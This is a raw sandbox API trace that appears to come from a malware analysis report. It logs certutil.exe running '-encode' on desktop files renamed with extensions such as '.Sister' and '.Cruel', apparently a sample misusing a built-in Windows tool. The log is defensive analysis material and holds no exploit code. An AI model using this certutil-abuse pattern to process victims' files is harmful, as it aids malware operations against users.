lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0243.756] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0243.756] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0243.756] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x162a5b33390 [0243.756] GetComputerNameW (in: lpBuffer=0x162a5b33390, nSize=0x4506b9f420 | out: lpBuffer="NQDPDE", nSize=0x4506b9f420) returned 1 [0243.757] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x4506b9f3f0 | out: lpBuffer=0x0, nSize=0x4506b9f3f0) returned 0 [0243.757] GetLastError () returned 0xea [0243.757] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x162a5b1b8c0 [0243.757] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x162a5b1b8c0, nSize=0x4506b9f3f0 | out: lpBuffer="NQdPdE", nSize=0x4506b9f3f0) returned 1 [0243.757] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0243.761] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x162a5b33760, cbCertEncoded=0xd83f) returned 0x0 [0243.765] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x162a5b33760, cbCrlEncoded=0xd83f) returned 0x0 [0243.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x162a5b33760, cbEncoded=0xd83f, dwFlags=0x8000, pDecodePara=0x4506b9f2d0, pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354 | out: pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354) returned 0 [0243.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x162a5b33760, cbEncoded=0xd83f, dwFlags=0x8000, pDecodePara=0x4506b9f2d0, pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354 | out: pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354) returned 0 [0243.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x162a5b33760, cbEncoded=0xd83f, dwFlags=0x8000, pDecodePara=0x4506b9f2d0, pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354 | out: pvStructInfo=0x4506b9f360, pcbStructInfo=0x4506b9f354) returned 0 [0243.768] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x162a5b10a90 [0243.778] CryptMsgUpdate (hCryptMsg=0x162a5b10a90, pbData=0x162a5b33760, cbData=0xd83f, fFinal=1) returned 0 [0243.778] GetLastError () returned 0x8009310b [0243.778] CryptMsgClose (hCryptMsg=0x162a5b10a90) returned 1 [0243.778] GetFileAttributesExW (in: lpFileName="PUKKYc6CLfNruQwL4y5O.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0x4506b9f380 | out: lpFileInformation=0x4506b9f380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f)) returned 1 [0243.778] _vsnwprintf (in: _Buffer=0x4506b9f388, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f378 | out: _Buffer="359") returned 3 [0243.778] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x4506b9f140, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0243.778] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x162a5b33060 [0243.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0243.778] _vsnwprintf (in: _Buffer=0x4506b9e370, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x4506b9f3c8 | out: _Buffer="Input Length = 55359") returned 20 [0243.778] GetFileType (hFile=0x50) returned 0x2 [0243.779] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e370*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x4506b9e324, lpReserved=0x0 | out: lpBuffer=0x4506b9e370*, lpNumberOfCharsWritten=0x4506b9e324*=0x14) returned 1 [0243.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0243.926] _vsnwprintf (in: _Buffer=0x4506b9e370, _BufferCount=0x1ff, _Format="\n", _ArgList=0x4506b9f3c8 | out: _Buffer="\n") returned 1 [0243.926] GetFileType (hFile=0x50) returned 0x2 [0243.926] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e370*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x4506b9e324, lpReserved=0x0 | out: lpBuffer=0x4506b9e370*, lpNumberOfCharsWritten=0x4506b9e324*=0x1) returned 1 [0244.079] GetFileAttributesExW (in: lpFileName="PUKKYc6CLfNruQwL4y5O.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0x4506b9f380 | out: lpFileInformation=0x4506b9f380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0c04bb, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xbc0c04bb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbc122057, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x12990)) returned 1 [0244.079] _vsnwprintf (in: _Buffer=0x4506b9f388, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f378 | out: _Buffer="361") returned 3 [0244.079] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x4506b9f140, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0244.079] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x162a5b33300 [0244.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.079] _vsnwprintf (in: _Buffer=0x4506b9e370, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x4506b9f3c8 | out: _Buffer="Output Length = 76176") returned 21 [0244.079] GetFileType (hFile=0x50) returned 0x2 [0244.079] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e370*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x4506b9e324, lpReserved=0x0 | out: lpBuffer=0x4506b9e370*, lpNumberOfCharsWritten=0x4506b9e324*=0x15) returned 1 [0244.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.152] _vsnwprintf (in: _Buffer=0x4506b9e370, _BufferCount=0x1ff, _Format="\n", _ArgList=0x4506b9f3c8 | out: _Buffer="\n") returned 1 [0244.152] GetFileType (hFile=0x50) returned 0x2 [0244.152] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e370*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x4506b9e324, lpReserved=0x0 | out: lpBuffer=0x4506b9e370*, lpNumberOfCharsWritten=0x4506b9e324*=0x1) returned 1 [0244.227] LocalFree (hMem=0x162a5b33760) returned 0x0 [0244.228] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0244.229] _vsnwprintf (in: _Buffer=0x4506b9f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f3d8 | out: _Buffer="2022") returned 4 [0244.229] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x4506b9f1a0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0244.229] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x162a5b08c40 [0244.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.229] _vsnwprintf (in: _Buffer=0x4506b9e3d0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x4506b9f428 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0244.229] GetFileType (hFile=0x50) returned 0x2 [0244.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e3d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x4506b9e384, lpReserved=0x0 | out: lpBuffer=0x4506b9e3d0*, lpNumberOfCharsWritten=0x4506b9e384*=0x31) returned 1 [0244.299] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.299] _vsnwprintf (in: _Buffer=0x4506b9e3d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x4506b9f428 | out: _Buffer="\n") returned 1 [0244.299] GetFileType (hFile=0x50) returned 0x2 [0244.300] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x4506b9e3d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x4506b9e384, lpReserved=0x0 | out: lpBuffer=0x4506b9e3d0*, lpNumberOfCharsWritten=0x4506b9e384*=0x1) returned 1 [0244.408] LocalFree (hMem=0x0) returned 0x0 [0244.409] LocalFree (hMem=0x162a5b0ae80) returned 0x0 [0244.409] LocalFree (hMem=0x162a5b091a0) returned 0x0 [0244.409] SetLastError (dwErrCode=0x80070716) [0244.409] _vsnwprintf (in: _Buffer=0x4506b9f458, _BufferCount=0xb, _Format="%d", _ArgList=0x4506b9f448 | out: _Buffer="511") returned 3 [0244.409] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x4506b9f210, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0244.409] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x162a5b33090 [0244.409] PostQuitMessage (nExitCode=0) [0244.410] GetMessageW (in: lpMsg=0x4506b9fa50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4506b9fa50) returned 0 [0244.410] LocalFree (hMem=0x162a5b1b8c0) returned 0x0 [0244.410] LocalFree (hMem=0x162a5b33390) returned 0x0 [0244.411] LocalFree (hMem=0x0) returned 0x0 [0244.411] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0244.412] GetLastError () returned 0x7e [0244.412] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0244.412] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0244.413] DllMain () returned 0x1 [0244.413] LocalFree (hMem=0x162a5b1b980) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b13f20) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b33060) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b33300) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b08c40) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b33090) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b11d20) returned 0x0 [0244.413] LocalFree (hMem=0x162a5b142b0) returned 0x0 [0244.413] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0244.413] GetLastError () returned 0x7e [0244.413] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0244.414] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0244.414] DllMain () returned 0x1 [0244.414] exit (_Code=0) Thread: id = 73 os_tid = 0x300 Process: id = "26" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x26628000" os_pid = "0x1294" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0x10ac [0245.338] GetStartupInfoW (in: lpStartupInfo=0x94313f9e0 | out: lpStartupInfo=0x94313f9e0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0245.339] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0245.339] __set_app_type (_Type=0x1) [0245.339] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0245.339] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0245.379] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0245.379] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0245.380] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0245.380] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0245.380] WerSetFlags () returned 0x0 [0245.451] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0245.451] __iob_func () returned 0x7ffcea2dea00 [0245.451] _fileno (_File=0x7ffcea2dea30) returned 1 [0245.451] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0245.451] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0245.452] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0245.452] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0245.452] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0245.453] GetConsoleOutputCP () returned 0x1b5 [0245.537] _vsnwprintf (in: _Buffer=0x94313f950, _BufferCount=0xb, _Format=".%d", _ArgList=0x94313f878 | out: _Buffer=".437") returned 4 [0245.537] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0245.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0245.537] GetFileType (hFile=0x50) returned 0x2 [0245.537] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0245.537] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0245.537] SetThreadUILanguage (LangId=0x0) returned 0x409 [0245.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0245.606] GetCommandLineW () returned="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"" [0245.606] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1fbe97cb320 [0245.606] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1fbe97bc870 [0245.606] LocalFree (hMem=0x1fbe97cb320) returned 0x0 [0245.606] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1fbe97bc220 [0245.606] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1fbe97bbb30 [0245.606] LocalFree (hMem=0x1fbe97bc220) returned 0x0 [0245.606] LocalFree (hMem=0x1fbe97bc870) returned 0x0 [0245.606] LocalFree (hMem=0x0) returned 0x0 [0245.606] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0245.606] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0245.607] GetCommandLineW () returned="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"" [0245.607] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1fbe97cb700 [0245.607] GetSystemTime (in: lpSystemTime=0x94313f640 | out: lpSystemTime=0x94313f640*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x14, wMilliseconds=0x93)) [0245.607] SystemTimeToFileTime (in: lpSystemTime=0x94313f640, lpFileTime=0x94313f638 | out: lpFileTime=0x94313f638) returned 1 [0245.607] FileTimeToLocalFileTime (in: lpFileTime=0x94313f638, lpLocalFileTime=0x94313f600 | out: lpLocalFileTime=0x94313f600) returned 1 [0245.607] FileTimeToSystemTime (in: lpFileTime=0x94313f600, lpSystemTime=0x94313f370 | out: lpSystemTime=0x94313f370) returned 1 [0245.607] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x94313f370, lpFormat=0x0, lpDateStr=0x94313f480, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0245.607] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x94313f370, lpFormat=0x0, lpTimeStr=0x94313f380, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0245.607] _vsnwprintf (in: _Buffer=0x94313f38e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x94313f358 | out: _Buffer=" 20.147s") returned 8 [0245.607] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1fbe97cde40 [0245.607] SetLastError (dwErrCode=0x80070716) [0245.607] _vsnwprintf (in: _Buffer=0x94313f408, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f3f8 | out: _Buffer="948") returned 3 [0245.608] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x94313f1c0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0245.608] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1fbe97cb360 [0245.608] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1fbe97d4c40 [0245.608] LocalFree (hMem=0x1fbe97cde40) returned 0x0 [0245.608] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x94313f6b0 | out: lpSystemTimeAsFileTime=0x94313f6b0*(dwLowDateTime=0xbd009e70, dwHighDateTime=0x1d6141f)) [0245.608] GetLocalTime (in: lpSystemTime=0x94313f6e8 | out: lpSystemTime=0x94313f6e8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x14, wMilliseconds=0x95)) [0245.608] SystemTimeToFileTime (in: lpSystemTime=0x94313f6e8, lpFileTime=0x94313f6c0 | out: lpFileTime=0x94313f6c0) returned 1 [0245.608] CompareFileTime (lpFileTime1=0x94313f6c0, lpFileTime2=0x94313f6b0) returned 1 [0245.608] _vsnwprintf (in: _Buffer=0x94313f6f8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x94313f688 | out: _Buffer="GMT + 2.00") returned 10 [0245.609] LocalFree (hMem=0x1fbe97cb700) returned 0x0 [0245.609] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0245.609] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0245.609] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0245.609] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0245.609] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0245.609] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x94313f728 | out: _Buffer="10.0.15063.447") returned 14 [0245.609] GetACP () returned 0x4e4 [0245.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0245.609] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1fbe97cb640 [0245.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1fbe97cb640, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0245.609] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1fbe97ce080 [0245.609] _vsnwprintf (in: _Buffer=0x1fbe97ce080, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94313f778 | out: _Buffer="10.0.15063.447 retail") returned 21 [0245.609] LocalFree (hMem=0x1fbe97cb640) returned 0x0 [0245.609] LocalFree (hMem=0x0) returned 0x0 [0245.609] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0245.609] GetACP () returned 0x4e4 [0245.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0245.609] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1fbe97cb500 [0245.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1fbe97cb500, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0245.609] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1fbe97ce200 [0245.609] _vsnwprintf (in: _Buffer=0x1fbe97ce200, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94313f778 | out: _Buffer="10.0.15063.447 retail") returned 21 [0245.609] LocalFree (hMem=0x1fbe97cb500) returned 0x0 [0245.609] LocalFree (hMem=0x0) returned 0x0 [0245.610] GetACP () returned 0x4e4 [0245.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0245.610] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1fbe97cb960 [0245.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1fbe97cb960, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0245.610] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1fbe97cde40 [0245.610] _vsnwprintf (in: _Buffer=0x1fbe97cde40, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x94313f7a8 | out: _Buffer="10.0.15063.447 retail147s") returned 21 [0245.610] LocalFree (hMem=0x1fbe97cb960) returned 0x0 [0245.610] LocalFree (hMem=0x1fbe97ce080) returned 0x0 [0245.610] LocalFree (hMem=0x1fbe97ce200) returned 0x0 [0245.610] LocalFree (hMem=0x1fbe97cde40) returned 0x0 [0245.610] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0245.610] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0245.610] GetStockObject (i=0) returned 0x900010 [0245.610] RegisterClassW (lpWndClass=0x94313f8d0) returned 0xc1a2 [0245.611] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2302be [0245.696] NtdllDefWindowProc_W () returned 0x0 [0245.697] NtdllDefWindowProc_W () returned 0x1 [0245.702] NtdllDefWindowProc_W () returned 0x0 [0245.709] UpdateWindow (hWnd=0x2302be) returned 1 [0245.709] PostMessageW (hWnd=0x2302be, Msg=0x400, wParam=0x0, lParam=0x1fbe97b217e) returned 1 [0245.709] GetMessageW (in: lpMsg=0x94313f920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94313f920) returned 1 [0245.709] TranslateMessage (lpMsg=0x94313f920) returned 0 [0245.709] DispatchMessageW (lpMsg=0x94313f920) returned 0x0 [0245.710] NtdllDefWindowProc_W () returned 0x0 [0245.710] GetMessageW (in: lpMsg=0x94313f920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94313f920) returned 1 [0245.710] TranslateMessage (lpMsg=0x94313f920) returned 0 [0245.710] DispatchMessageW (lpMsg=0x94313f920) returned 0x0 [0245.710] LocalAlloc (uFlags=0x0, uBytes=0x76) returned 0x1fbe97b8970 [0245.710] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x1fbe97b97a0 [0245.710] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0245.710] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0245.710] SetLastError (dwErrCode=0x80070716) [0245.710] _vsnwprintf (in: _Buffer=0x94313f328, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f318 | out: _Buffer="465") returned 3 [0245.710] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x94313f0e0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0245.710] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1fbe97bbc80 [0245.711] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0245.711] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0245.711] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x94313f0c0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0245.711] GetLastError () returned 0xcb [0245.711] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0245.711] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0245.711] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 